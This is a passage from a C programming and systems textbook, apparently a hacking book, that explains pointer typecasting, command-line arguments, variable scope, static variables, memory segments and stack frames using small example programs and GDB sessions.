      hacky_nonpointer = hacky_nonpointer + sizeof(int);
   }
}

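This is rather hacky, but since this integer value is typecast into the proper pointer type when it is assigned and dereferenced, the end result is the same. Notice that instead of typecasting multiple times to do pointer arithmetic on an unsigned integer (which isn't even a pointer), the sizeof operator is used to achieve the same result with ordinary arithmetic.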

reader@hacking:~/booksrc $ gcc pointer_types5.c
reader@hacking:~/booksrc $ ./a.out
[hacky_nonpointer] points to 0xbffff810, which contains the char 'a'
[hacky_nonpointer] points to 0xbffff811, which contains the char 'b'
[hacky_nonpointer] points to 0xbffff812, which contains the char 'c'
[hacky_nonpointer] points to 0xbffff813, which contains the char 'd'
[hacky_nonpointer] points to 0xbffff814, which contains the char 'e'
[hacky_nonpointer] points to 0xbffff7f0, which contains the integer 1
[hacky_nonpointer] points to 0xbffff7f4, which contains the integer 2
[hacky_nonpointer] points to 0xbffff7f8, which contains the integer 3
[hacky_nonpointer] points to 0xbffff7fc, which contains the integer 4
[hacky_nonpointer] points to 0xbffff800, which contains the integer 5
reader@hacking:~/booksrc $

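The important thing to remember about variables in C is that the compiler is the only thing that cares about a variable's type. In the end, after the program has been compiled, the variables are nothing more than memory addresses. This means that variables of one type can easily be coerced into behaving like another type by telling the compiler to typecast them into the desired type.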

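Command-Line Arguments

Many nongraphical programs receive input in the form of command-line arguments. Unlike input read with scanf(), command-line arguments don't require user interaction after the program has begun execution. This tends to be more efficient and is a useful input method.

In C, command-line arguments can be accessed in the main() function by giving it two additional arguments: an integer and a pointer to an array of strings. The integer contains the number of arguments, and the array of strings contains each of those arguments. The commandline.c program and its execution should explain things.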

commandline.c

#include <stdio.h>

int main(int arg_count, char *arg_list[]) {
   int i;
   printf("There were %d arguments provided:\n", arg_count);
   for(i=0; i < arg_count; i++)
      printf("argument #%d\t-\t%s\n", i, arg_list[i]);
}

reader@hacking:~/booksrc $ gcc -o commandline commandline.c
reader@hacking:~/booksrc $ ./commandline
There were 1 arguments provided:
argument #0     -       ./commandline
reader@hacking:~/booksrc $ ./commandline this is a test
There were 5 arguments provided:
argument #0     -       ./commandline
argument #1     -       this
argument #2     -       is
argument #3     -       a
argument #4     -       test
reader@hacking:~/booksrc $

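The zeroth argument is always the name of the executing binary, and the rest of the argument array (often called an argument vector) contains the remaining arguments as strings.

Sometimes a program will want to use a command-line argument as an integer rather than a string. Regardless, the argument is passed in as a string; however, there are standard conversion functions. Unlike simple typecasting, these functions can actually convert character arrays containing digits into real integers. The most common of these functions is atoi(), which is short for ASCII to integer. This function accepts a pointer to a string as its argument and returns the integer value it represents. Observe its usage in convert.c.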

convert.c

#include <stdio.h>
#include <stdlib.h>

void usage(char *program_name) {
   printf("Usage: %s <message> <# of times to repeat>\n", program_name);
   exit(1);
}

int main(int argc, char *argv[]) {
   int i, count;

   if(argc < 3)      // If fewer than 3 arguments are used,
      usage(argv[0]); // display usage message and exit.

   count = atoi(argv[2]); // Convert the 2nd arg into an integer.
   printf("Repeating %d times..\n", count);

   for(i=0; i < count; i++)
      printf("%3d - %s\n", i, argv[1]); // Print the 1st arg.
}

The results of compiling and executing convert.c are as follows.

reader@hacking:~/booksrc $ gcc convert.c
reader@hacking:~/booksrc $ ./a.out
Usage: ./a.out <message> <# of times to repeat>
reader@hacking:~/booksrc $ ./a.out 'Hello, world!' 3
Repeating 3 times..
  0 - Hello, world!
  1 - Hello, world!
  2 - Hello, world!
reader@hacking:~/booksrc $

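In convert.c, an if statement makes sure that three arguments are present before these strings are accessed. If the program tries to access memory that doesn't exist or that the program doesn't have permission to read, the program will crash. In C it is important to check for these types of conditions and handle them in program logic. If the error-checking if statement is commented out, this memory violation can be explored. The convert2.c program should make this clearer.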

convert2.c

#include <stdio.h>

void usage(char *program_name) {
   printf("Usage: %s <message> <# of times to repeat>\n", program_name);
   exit(1);
}

int main(int argc, char *argv[]) {
   int i, count;

//  if(argc < 3)      // If fewer than 3 arguments are used,
//    usage(argv[0]); // display usage message and exit.

   count = atoi(argv[2]); // Convert the 2nd arg into an integer.
   printf("Repeating %d times..\n", count);

   for(i=0; i < count; i++)
      printf("%3d - %s\n", i, argv[1]); // Print the 1st arg.
}

The results of compiling and executing convert2.c are as follows.

reader@hacking:~/booksrc $ gcc convert2.c
reader@hacking:~/booksrc $ ./a.out test
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

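When the program isn't given enough command-line arguments, it still tries to access elements of the argument array, even though they don't exist. This results in the program crashing with a segmentation fault.

Memory is split into segments (which will be discussed later), and some memory addresses aren't within the boundaries of the memory segments the program has been given access to. When the program attempts to access an address that is out of bounds, it crashes in what is called a segmentation fault. This effect can be explored further with GDB.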

reader@hacking:~/booksrc $ gcc -g convert2.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) run test
Starting program: /home/reader/booksrc/a.out test

Program received signal SIGSEGV, Segmentation fault.
0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) where
#0  0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc.so.6
#1  0xb800183c in ?? ()
#2  0x00000000 in ?? ()
(gdb) break main
Breakpoint 1 at 0x8048419: file convert2.c, line 14.
(gdb) run test
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reader/booksrc/a.out test

Breakpoint 1, main (argc=2, argv=0xbffff894) at convert2.c:14
14         count = atoi(argv[2]); // convert the 2nd arg into an integer
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xb7ec819b in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) x/3xw 0xbffff894
0xbffff894:     0xbffff9b3      0xbffff9ce      0x00000000
(gdb) x/s 0xbffff9b3
0xbffff9b3:      "/home/reader/booksrc/a.out"
(gdb) x/s 0xbffff9ce
0xbffff9ce:      "test"
(gdb) x/s 0x00000000
0x0:     <Address 0x0 out of bounds>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

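The program is executed within GDB with the single command-line argument test, which causes it to crash. The where command will sometimes show a useful backtrace of the stack; in this case, however, the stack was too badly mangled in the crash. A breakpoint is set on main and the program is re-executed to obtain the value of the argument vector (argv=0xbffff894 in the breakpoint line). Since the argument vector is a pointer to a list of strings, it is actually a pointer to a list of pointers. Using the command x/3xw to examine the first three memory addresses stored at the argument vector's address shows that they are themselves pointers to strings. The first one is the zeroth argument, the second is the test argument, and the third is zero, which is out of bounds. When the program tries to access this memory address, it crashes with a segmentation fault.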

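Variable Scoping

Another interesting concept regarding memory in C is variable scoping, or context; in particular, the contexts of variables within functions. Each function has its own set of local variables, which are independent of everything else. In fact, multiple calls to the same function each have their own context. You can use the printf() function with format strings to explore this quickly; check it out in scope.c.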

scope.c

#include <stdio.h>

void func3() {
   int i = 11;
   printf("\t\t\t[in func3] i = %d\n", i);
}

void func2() {
   int i = 7;
   printf("\t\t[in func2] i = %d\n", i);
   func3();
   printf("\t\t[back in func2] i = %d\n", i);
}

void func1() {
   int i = 5;
   printf("\t[in func1] i = %d\n", i);
   func2();
   printf("\t[back in func1] i = %d\n", i);
}

int main() {
   int i = 3;
   printf("[in main] i = %d\n", i);
   func1();
   printf("[back in main] i = %d\n", i);
}

The output of this simple program demonstrates nested function calls.

reader@hacking:~/booksrc $ gcc scope.c
reader@hacking:~/booksrc $ ./a.out
[in main] i = 3
        [in func1] i = 5
                [in func2] i = 7
                        [in func3] i = 11
                [back in func2] i = 7
        [back in func1] i = 5
[back in main] i = 3
reader@hacking:~/booksrc $

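In each function, the variable i is set to a different value and printed. Notice that within the main() function the variable i is 3, even after func1() has been called, where the variable i is 5. Similarly, within func1() the variable i remains 5, even after func2() has been called, where i is 7, and so forth. The best way to think of this is that each function call has its own version of the variable i.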

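Variables can also have a global scope, which means they persist across all functions. Variables are global if they are defined at the beginning of the code, outside of any function. In the scope2.c example code shown below, the variable j is declared globally and set to 42. This variable can be read from and written to by any function, and changes to it persist between functions.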

scope2.c

#include <stdio.h>

int j = 42; // j is a global variable.

void func3() {
   int i = 11, j = 999; // Here, j is a local variable of func3().
   printf("\t\t\t[in func3] i = %d, j = %d\n", i, j);
}

void func2() {
   int i = 7;
   printf("\t\t[in func2] i = %d, j = %d\n", i, j);
   printf("\t\t[in func2] setting j = 1337\n");
   j = 1337; // Writing to j
   func3();
   printf("\t\t[back in func2] i = %d, j = %d\n", i, j);
}

void func1() {
   int i = 5;
   printf("\t[in func1] i = %d, j = %d\n", i, j);
   func2();
   printf("\t[back in func1] i = %d, j = %d\n", i, j);
}

int main() {
   int i = 3;
   printf("[in main] i = %d, j = %d\n", i, j);
   func1();
   printf("[back in main] i = %d, j = %d\n", i, j);
}

The results of compiling and executing scope2.c are as follows.

reader@hacking:~/booksrc $ gcc scope2.c
reader@hacking:~/booksrc $ ./a.out
[in main] i = 3, j = 42
        [in func1] i = 5, j = 42
                [in func2] i = 7, j = 42
                [in func2] setting j = 1337
                        [in func3] i = 11, j = 999
                [back in func2] i = 7, j = 1337
        [back in func1] i = 5, j = 1337
[back in main] i = 3, j = 1337 
reader@hacking:~/booksrc $

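In the output, the global variable j is written to in func2(), and the change persists in all functions except func3(), which has its own local variable called j. In this case, the compiler prefers to use the local variable. With all these variables using the same names it can be a little confusing, but remember that in the end it's all just memory. The global variable j is simply stored in memory, and every function is able to access that memory. The local variables of each function are each stored in their own places in memory, regardless of identical names. Printing the memory addresses of these variables gives a clearer picture of what is going on. In the scope3.c example code below, the variable addresses are printed using the unary address-of operator.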

scope3.c

#include <stdio.h>

int j = 42; // j is a global variable.

void func3() {
   int i = 11, j = 999; // Here, j is a local variable of func3().
   printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
   printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
}

void func2() {
   int i = 7;
   printf("\t\t[in func2] i @ 0x%08x = %d\n", &i, i);
   printf("\t\t[in func2] j @ 0x%08x = %d\n", &j, j);
   printf("\t\t[in func2] setting j = 1337\n");
   j = 1337; // Writing to j
   func3();
   printf("\t\t[back in func2] i @ 0x%08x = %d\n", &i, i);
   printf("\t\t[back in func2] j @ 0x%08x = %d\n", &j, j);
}

void func1() {
   int i = 5;
   printf("\t[in func1] i @ 0x%08x = %d\n", &i, i);
   printf("\t[in func1] j @ 0x%08x = %d\n", &j, j);
   func2();
   printf("\t[back in func1] i @ 0x%08x = %d\n", &i, i);
   printf("\t[back in func1] j @ 0x%08x = %d\n", &j, j);
}

int main() {
   int i = 3;
   printf("[in main] i @ 0x%08x = %d\n", &i, i);
   printf("[in main] j @ 0x%08x = %d\n", &j, j);
   func1();
   printf("[back in main] i @ 0x%08x = %d\n", &i, i);
   printf("[back in main] j @ 0x%08x = %d\n", &j, j);
}

The results of compiling and executing scope3.c are as follows.

reader@hacking:~/booksrc $ gcc scope3.c 
reader@hacking:~/booksrc $ ./a.out
[in main] i @ 0xbffff834 = 3
[in main] j @ 0x08049988 = 42
        [in func1] i @ 0xbffff814 = 5
        [in func1] j @ 0x08049988 = 42
                [in func2] i @ 0xbffff7f4 = 7
                [in func2] j @ 0x08049988 = 42
                [in func2] setting j = 1337
                        [in func3] i @ 0xbffff7d4 = 11
                        [in func3] j @ 0xbffff7d0 = 999
                [back in func2] i @ 0xbffff7f4 = 7
                [back in func2] j @ 0x08049988 = 1337
        [back in func1] i @ 0xbffff814 = 5
        [back in func1] j @ 0x08049988 = 1337
[back in main] i @ 0xbffff834 = 3
[back in main] j @ 0x08049988 = 1337
reader@hacking:~/booksrc $

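In this output, it is obvious that the variable j used by func3() is different from the j used by the other functions. The j used by func3() is located at 0xbffff7d0, while the j used by the other functions is located at 0x08049988. Also, notice that the variable i is actually at a different memory address for each function.

In the following output, GDB is used to stop execution at a breakpoint in func3(). Then the backtrace command shows the record of each function call on the stack.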

reader@hacking:~/booksrc $ gcc -g scope3.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2
3       int j = 42; // j is a global variable.
4
5       void func3() {
6          int i = 11, j = 999; // Here, j is a local variable of func3().
7          printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
8          printf("\t\t\t[in func3] j @ 0x%08x = %d\n", &j, j);
9       }
10
(gdb) break 7
Breakpoint 1 at 0x8048388: file scope3.c, line 7.
(gdb) run
Starting program: /home/reader/booksrc/a.out
[in main] i @ 0xbffff804 = 3
[in main] j @ 0x08049988 = 42
        [in func1] i @ 0xbffff7e4 = 5
        [in func1] j @ 0x08049988 = 42
                [in func2] i @ 0xbffff7c4 = 7
                [in func2] j @ 0x08049988 = 42
                [in func2] setting j = 1337

Breakpoint 1, func3 () at scope3.c:7
7          printf("\t\t\t[in func3] i @ 0x%08x = %d\n", &i, i);
(gdb) bt
#0  func3 () at scope3.c:7
#1  0x0804841d in func2 () at scope3.c:17
#2  0x0804849f in func1 () at scope3.c:26
#3  0x0804852b in main () at scope3.c:35
(gdb)

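The backtrace also shows the nested function calls by looking at the records kept on the stack. Each time a function is called, a record called a stack frame is put on the stack. Each line in the backtrace corresponds to a stack frame. Each stack frame also contains the local variables for that context. The local variables contained in each stack frame can be shown in GDB by adding the word full to the backtrace command.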

(gdb) bt full
#0  func3 () at scope3.c:7
        i = 11
        j = 999
#1  0x0804841d in func2 () at scope3.c:17
        i = 7
#2  0x0804849f in func1 () at scope3.c:26
        i = 5
#3  0x0804852b in main () at scope3.c:35
        i = 3
(gdb)

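The full backtrace clearly shows that the local variable j exists only in func3()'s context. The global version of the variable j is used in the other functions' contexts.

In addition to globals, variables can also be defined as static variables by prepending the keyword static to the variable definition. Similar to global variables, a static variable remains intact between function calls; however, static variables are also akin to local variables, since they remain local within a particular function context. One distinctive feature of static variables is that they are initialized only once. The code in static.c will help explain these concepts.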

static.c

#include <stdio.h>

void function() { // An example function, with its own context
   int var = 5;
   static int static_var = 5; // Static variable initialization

   printf("\t[in function] var = %d\n", var);
   printf("\t[in function] static_var = %d\n", static_var);
   var++;          // Add one to var.
   static_var++;   // Add one to static_var.
}

int main() { // The main function, with its own context
   int i;
   static int static_var = 1337; // Another static, in a different context

   for(i=0; i < 5; i++) { // Loop 5 times.
      printf("[in main] static_var = %d\n", static_var);
      function(); // Call the function.
   }
}

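The aptly named static_var is defined as a static variable in two places: within the context of main() and within the context of function(). Since static variables are local within a particular functional context, these variables can have the same name, but they actually represent two different locations in memory. The function simply prints the values of the two variables in its context and then adds 1 to each of them. Compiling and executing this code shows the difference between the static and nonstatic variables.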

reader@hacking:~/booksrc $ gcc static.c
reader@hacking:~/booksrc $ ./a.out
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 5
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 6
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 7
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 8
[in main] static_var = 1337
        [in function] var = 5
        [in function] static_var = 9
reader@hacking:~/booksrc $

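Notice that static_var retains its value between subsequent calls to function(). This is because static variables keep their values, and also because they are initialized only once. In addition, since static variables are local to a particular functional context, the static_var in the context of main() retains its value of 1337 the entire time.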

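Once again, printing the addresses of the variables from static.c with the unary address-of operator provides greater insight into what is really going on. Take a look at static2.c for an example.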

static2.c

#include <stdio.h>

void function() { // An example function, with its own context
   int var = 5;
   static int static_var = 5; // Static variable initialization

   printf("\t[in function] var  @ %p = %d\n", &var, var);
   printf("\t[in function] static_var @ %p = %d\n", &static_var, static_var);
   var++;          // Add 1 to var.
   static_var++;   // Add 1 to static_var.
}

int main() { // The main function, with its own context
   int i;
   static int static_var = 1337; // Another static, in a different context

   for(i=0; i < 5; i++) { // loop 5 times
      printf("[in main] static_var @ %p = %d\n", &static_var, static_var);
      function(); // Call the function.
   } 
}

The results of compiling and executing static2.c are as follows.

reader@hacking:~/booksrc $ gcc static2.c
reader@hacking:~/booksrc $ ./a.out
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 5
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 6
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 7
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 8
[in main] static_var @ 0x804968c = 1337
        [in function] var  @ 0xbffff814 = 5
        [in function] static_var @ 0x8049688 = 9
reader@hacking:~/booksrc $

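With the variable addresses displayed, it is apparent that the static_var in main() is different from the one found in function(), since they are located at different memory addresses (0x804968c and 0x8049688, respectively). You may have noticed that the addresses of the local variables are all very high, like 0xbffff814, while the addresses of the global and static variables are all very low, like 0x0804968c and 0x8049688. That's very astute of you; noticing details like this and asking why is one of the cornerstones of hacking. Read on for your answers.

Memory Segmentation

A compiled program's memory is divided into five segments: text, data, bss, heap, and stack. Each segment represents a special portion of memory that is set aside for a certain purpose.

The text segment is also sometimes called the code segment. This is where the assembled machine language instructions of the program are located. The execution of instructions in this segment is nonlinear, because the high-level control structures and functions discussed earlier compile into branch, jump, and call instructions in assembly language. As a program executes, EIP is set to the first instruction in the text segment. The processor then follows an execution loop that does the following:

1. Reads the instruction that EIP is pointing to
2. Adds the byte length of the instruction to EIP
3. Executes the instruction that was read in step 1
4. Goes back to step 1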

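Sometimes the instruction will be a jump or a call instruction, which changes EIP to a different address in memory. The processor doesn't care about the change, because it expects execution to be nonlinear anyway. If EIP is changed in step 3, the processor simply goes back to step 1 and reads the instruction found at whatever address EIP was changed to.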

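Write permission is disabled in the text segment, since it is not used to store variables, only code. This prevents people from actually modifying the program code; any attempt to write to this segment of memory causes the program to alert the user that something bad happened, and the program is killed. Another advantage of this segment being read-only is that it can be shared among different copies of the program, allowing multiple executions of the program at the same time without any problems. It should also be noted that this memory segment has a fixed size, since nothing ever changes in it.

The data and bss segments are used to store global and static program variables. The data segment is filled with the initialized global and static variables, while the bss segment is filled with their uninitialized counterparts. Although these segments are writable, they also have a fixed size. Remember that global variables persist regardless of the functional context (like the variable j in the previous examples). Both global and static variables are able to persist because they are stored in their own memory segments.

The heap segment is a segment of memory that a programmer can directly control. Blocks of memory in this segment can be allocated and used for whatever the programmer might need. One notable point about the heap segment is that it isn't of fixed size, so it can grow larger or smaller as needed. All of the memory within the heap is managed by allocator and deallocator algorithms, which respectively reserve a region of memory in the heap for use and remove reservations so that portion of memory can be reused for later reservations. The heap grows and shrinks depending on how much memory is reserved for use. This means a programmer using the heap allocation functions can reserve and free memory on the fly. The heap grows downward in the memory listing, toward higher memory addresses.

The stack segment also has variable size and is used as a temporary scratch pad to store local function variables and context during function calls. This is what GDB's backtrace command looks at. When a program calls a function, that function has its own set of passed variables, and the function's code is at a different memory location in the text (or code) segment. Since the context and EIP must change when a function is called, the stack is used to remember all of the passed variables, the location EIP should return to after the function is finished, and all the local variables used by that function. All of this information is stored together on the stack in what is collectively called a stack frame. The stack contains many stack frames.

In general computer science terms, a stack is an abstract data structure that is used frequently. It has first-in, last-out (FILO) ordering, which means the first item put onto a stack is the last item to come off it. Think of it as putting beads on a piece of string that has a knot on one end: you can't get the first bead off until you have removed all the other beads. When an item is placed onto a stack, it's known as pushing, and when an item is removed from a stack, it's called popping.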

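As the name implies, the stack segment of memory is in fact a stack data structure, which contains stack frames. The ESP register is used to keep track of the address of the end of the stack, which is constantly changing as items are pushed onto and popped off of it. Since this is very dynamic behavior, it makes sense that the stack is also not of fixed size. Opposite to the dynamic growth of the heap, as the stack changes in size it grows upward in a visual listing of memory, toward lower memory addresses.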

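The FILO nature of a stack might seem odd, but since the stack is used to store context, it is very useful. When a function is called, several things are pushed onto the stack together in a stack frame. The EBP register, sometimes called the frame pointer (FP) or local base (LB) pointer, is used to reference local function variables in the current stack frame. Each stack frame contains the parameters to the function, its local variables, and two pointers that are necessary to put things back the way they were: the saved frame pointer (SFP) and the return address. The SFP is used to restore EBP to its previous value, and the return address is used to restore EIP to the next instruction found after the function call. This restores the functional context of the previous stack frame.

The following stack_example.c code has two functions: main() and test_function().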

stack_example.c

void test_function(int a, int b, int c, int d) {
   int flag;
   char buffer[10];

   flag = 31337;
   buffer[0] = 'A';
}

int main() {
   test_function(1, 2, 3, 4);
}

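This program first declares a test function that has four arguments, all declared as integers: a, b, c, and d. The local variables for the function include an integer called flag and a 10-character buffer called buffer. The memory for these variables is in the stack segment, while the machine instructions for the function's code are stored in the text segment. After compiling the program, its inner workings can be examined with GDB. The following output shows the disassembled machine instructions for main() and test_function(). The main() function starts at 0x08048357 and test_function() starts at 0x08048344. The first few instructions of each function (main+0 through main+14, and test_function+0 through test_function+3) set up the stack frame. These instructions are collectively called the procedure prologue or function prologue. They save the frame pointer on the stack, and they reserve stack memory for the local function variables. Sometimes the function prologue also handles some stack alignment. The exact prologue instructions vary greatly depending on the compiler and compiler options, but in general these instructions build the stack frame.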

reader@hacking:~/booksrc $ gcc -g stack_example.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main():
0x08048357 <main+0>:    push   ebp
0x08048358 <main+1>:    mov    ebp,esp
0x0804835a <main+3>:    sub    esp,0x18
0x0804835d <main+6>:    and    esp,0xfffffff0
0x08048360 <main+9>:    mov    eax,0x0
0x08048365 <main+14>:   sub    esp,eax
0x08048367 <main+16>:   mov    DWORD PTR [esp+12],0x4
0x0804836f <main+24>:   mov    DWORD PTR [esp+8],0x3
0x08048377 <main+32>:   mov    DWORD PTR [esp+4],0x2
0x0804837f <main+40>:   mov    DWORD PTR [esp],0x1
0x08048386 <main+47>:   call   0x8048344 <test_function>
0x0804838b <main+52>:   leave
0x0804838c <main+53>:   ret
End of assembler dump
(gdb) disass test_function()
Dump of assembler code for function test_function:
0x08048344 <test_function+0>:   push   ebp
0x08048345 <test_function+1>:   mov    ebp,esp
0x08048347 <test_function+3>:   sub    esp,0x28
0x0804834a <test_function+6>:   mov    DWORD PTR [ebp-12],0x7a69
0x08048351 <test_function+13>:  mov    BYTE PTR [ebp-40],0x41
0x08048355 <test_function+17>:  leave
0x08048356 <test_function+18>:  ret
End of assembler dump
(gdb)

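When the program is run, the main() function is called, which simply calls test_function().

When test_function() is called from the main() function, various values are placed on the stack to create the start of the stack frame, as follows. The function arguments are put on the stack in reverse order (since it's FILO). The arguments for the function are 1, 2, 3, and 4, so 4 goes on first, then 3, then 2, and finally 1. These values correspond to the variables d, c, b, and a in the function. In this build the compiler places them with four mov instructions relative to ESP (main+16 through main+40 in the disassembly of main() below) rather than with literal push instructions, but the resulting layout is the same.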

(gdb) disass main
Dump of assembler code for function main:
0x08048357 <main+0>:    push   ebp
0x08048358 <main+1>:    mov    ebp,esp
0x0804835a <main+3>:    sub    esp,0x18
0x0804835d <main+6>:    and    esp,0xfffffff0
0x08048360 <main+9>:    mov    eax,0x0
0x08048365 <main+14>:   sub    esp,eax
0x08048367 <main+16>:   mov    DWORD PTR [esp+12],0x4
0x0804836f <main+24>:   mov    DWORD PTR [esp+8],0x3
0x08048377 <main+32>:   mov    DWORD PTR [esp+4],0x2
0x0804837f <main+40>:   mov    DWORD PTR [esp],0x1
0x08048386 <main+47>:   call   0x8048344 <test_function>
0x0804838b <main+52>:   leave
0x0804838c <main+53>:   ret
End of assembler dump
(gdb)

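Next, when the assembly call instruction is executed, the return address is pushed onto the stack and the execution flow jumps to the start of test_function() at 0x08048344. The return address is the location of the instruction that follows the call; specifically, it is the value EIP already holds after step 2 of the execution loop described earlier, which the call instruction stores when it executes in step 3. In this case, the return address points to the leave instruction in main() at 0x0804838b.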

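The call instruction both stores the return address on the stack and jumps EIP to the beginning of test_function(), so test_function()'s procedure prologue instructions finish building the stack frame. In this step, the current value of EBP is pushed onto the stack. This value is called the saved frame pointer (SFP) and is later used to restore EBP to its original state. The current value of ESP is then copied into EBP to set the new frame pointer. This frame pointer is used to reference the local variables of the function (flag and buffer). Memory is reserved for these variables by subtracting from ESP. In the end, the stack frame looks something like this:

Figure 0x200-1. Stack frame for test_function(), from the top of the stack (low addresses) to high addresses: buffer, flag, saved frame pointer (SFP), return address, a, b, c, d.

We can watch the stack frame being constructed on the stack using GDB. In the following output, breakpoints are set in main() just before the call to test_function() and at the beginning of test_function(). GDB puts the first breakpoint before the function arguments are placed on the stack, and the second breakpoint after test_function()'s procedure prologue. When the program is run, execution stops at each breakpoint, where the ESP (stack pointer), EBP (frame pointer), and EIP (instruction pointer) registers are examined.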

(gdb) list main
4
5          flag = 31337;
6          buffer[0] = 'A';
7       }
8
9       int main() {
10         test_function(1, 2, 3, 4);
11      }
(gdb) break 10
Breakpoint 1 at 0x8048367: file stack_example.c, line 10.
(gdb) break test_function
Breakpoint 2 at 0x804834a: file stack_example.c, line 5.
(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main () at stack_example.c:10
10         test_function(1, 2, 3, 4);
(gdb) i r esp ebp eip
esp            0xbffff7f0       0xbffff7f0
ebp            0xbffff808       0xbffff808
eip            0x8048367        0x8048367 <main+16>
(gdb) x/5i $eip
0x8048367 <main+16>:    mov    DWORD PTR [esp+12],0x4
0x804836f <main+24>:    mov    DWORD PTR [esp+8],0x3
0x8048377 <main+32>:    mov    DWORD PTR [esp+4],0x2
0x804837f <main+40>:    mov    DWORD PTR [esp],0x1
0x8048386 <main+47>:    call   0x8048344 <test_function>
(gdb)

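This breakpoint is right before the stack frame for the test_function() call is created. This means the bottom of this new stack frame is at the current value of ESP, 0xbffff7f0. The next breakpoint is right after the procedure prologue of test_function(), so continuing will build the stack frame. The output below shows similar information at the second breakpoint. The local variables (flag and buffer) are referenced relative to the frame pointer (EBP).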

(gdb) cont
Continuing.

Breakpoint 2, test_function (a=1, b=2, c=3, d=4) at stack_example.c:5
5          flag = 31337;
(gdb) i r esp ebp eip
esp            0xbffff7c0       0xbffff7c0
ebp            0xbffff7e8       0xbffff7e8
eip            0x804834a        0x804834a <test_function+6>
(gdb) disass test_function
Dump of assembler code for function test_function:
0x08048344 <test_function+0>:   push   ebp
0x08048345 <test_function+1>:   mov    ebp,esp
0x08048347 <test_function+3>:   sub    esp,0x28
0x0804834a <test_function+6>:   mov    DWORD PTR [ebp-12],0x7a69
0x08048351 <test_function+13>:  mov    BYTE PTR [ebp-40],0x41
0x08048355 <test_function+17>:  leave
0x08048356 <test_function+18>:  ret
End of assembler dump.
(gdb) print $ebp-12
$1 = (void *) 0xbffff7dc
(gdb) print $ebp-40
$2 = (void *) 0xbffff7c0
(gdb) x/16xw $esp
0xbffff7c0:   0x00000000      0x08049548      0xbffff7d8      0x08048249
0xbffff7d0:     0xb7f9f729      0xb7fd6ff4      0xbffff808      0x080483b9
0xbffff7e0:     0xb7fd6ff4      0xbffff89c      0xbffff808      0x0804838b
0xbffff7f0:     0x00000001      0x00000002      0x00000003      0x00000004
(gdb)

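The stack frame is shown at the end of the stack. The four arguments to the function can be seen at the bottom of the stack frame (starting at 0xbffff7f0), with the return address, 0x0804838b, found directly on top of them (at 0xbffff7ec). Above that is the saved frame pointer of 0xbffff808 (at 0xbffff7e8), which is what EBP was in the previous stack frame. The rest of the memory is reserved for the local stack variables flag and buffer. Calculating their addresses relative to EBP shows their exact locations in the stack frame: memory for the flag variable is at 0xbffff7dc, and memory for the buffer variable is at 0xbffff7c0. The extra space in the stack frame is just padding.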

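After the function finishes executing, the entire stack frame is popped off the stack, and EIP is set to the return address so the program can continue execution. If another function were called within the function, another stack frame would be pushed onto the stack, and so on. As each function ends, its stack frame is popped off the stack so execution can return to the previous function. This behavior is the reason this segment of memory is organized in a FILO data structure.

The various segments of memory are arranged in the order they were presented, from the lower memory addresses to the higher memory addresses. Since most people are familiar with numbered lists that count downward, the smaller memory addresses are shown at the top. Some texts have this reversed, which can be very confusing; so for this book, smaller memory addresses are always shown at the top. Most debuggers also display memory in this style, with the smaller memory addresses at the top and the higher ones at the bottom.

Since the heap and the stack are both dynamic, they grow toward each other. This minimizes wasted space, allowing the stack to be larger if the heap is small and vice versa.

Figure 0x200-2. Memory segments from low addresses (top) to high addresses (bottom): text, data, bss, heap (growing down toward higher addresses), and stack (growing up toward lower addresses).

Memory Segments in C

In C, as in other compiled languages, the compiled code goes into the text segment, while the variables reside in the remaining segments. Exactly which memory segment a variable is stored in depends on how the variable is defined. Variables that are defined outside of any function are considered to be global. The static keyword can also be prepended to any variable declaration to make the variable static. If static or global variables are initialized with data, they are stored in the data memory segment; otherwise, these variables are put in the bss memory segment. Memory on the heap memory segment must first be allocated using a memory allocation function called malloc(). Usually, pointers are used to reference memory on the heap. Finally, the remaining function variables are stored in the stack memory segment. Since the stack can contain many different stack frames, stack variables can remain unique within different functional contexts. The memory_segments.c program will help explain these concepts in C.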

memory_segments.c

#include <stdio.h>
#include <stdlib.h>

int global_var;

int global_initialized_var = 5;

void function() {  // This is just a demo function.
   int stack_var; // Notice this variable has the same name as the one in main().

   printf("the function's stack_var is at address 0x%08x\n", &stack_var);
}

int main() {
   int stack_var; // Same name as the variable in function()
   static int static_initialized_var = 5;
   static int static_var;
   int *heap_var_ptr;

   heap_var_ptr = (int *) malloc(4);

   // These variables are in the data segment.
   printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var);
   printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var);

   // These variables are in the bss segment.
   printf("static_var is at address 0x%08x\n", &static_var);
   printf("global_var is at address 0x%08x\n\n", &global_var);

   // This variable is in the heap segment.
   printf("heap_var is at address 0x%08x\n\n", heap_var_ptr);

   // These variables are in the stack segment.
   printf("stack_var is at address 0x%08x\n", &stack_var);
   function(); 
}

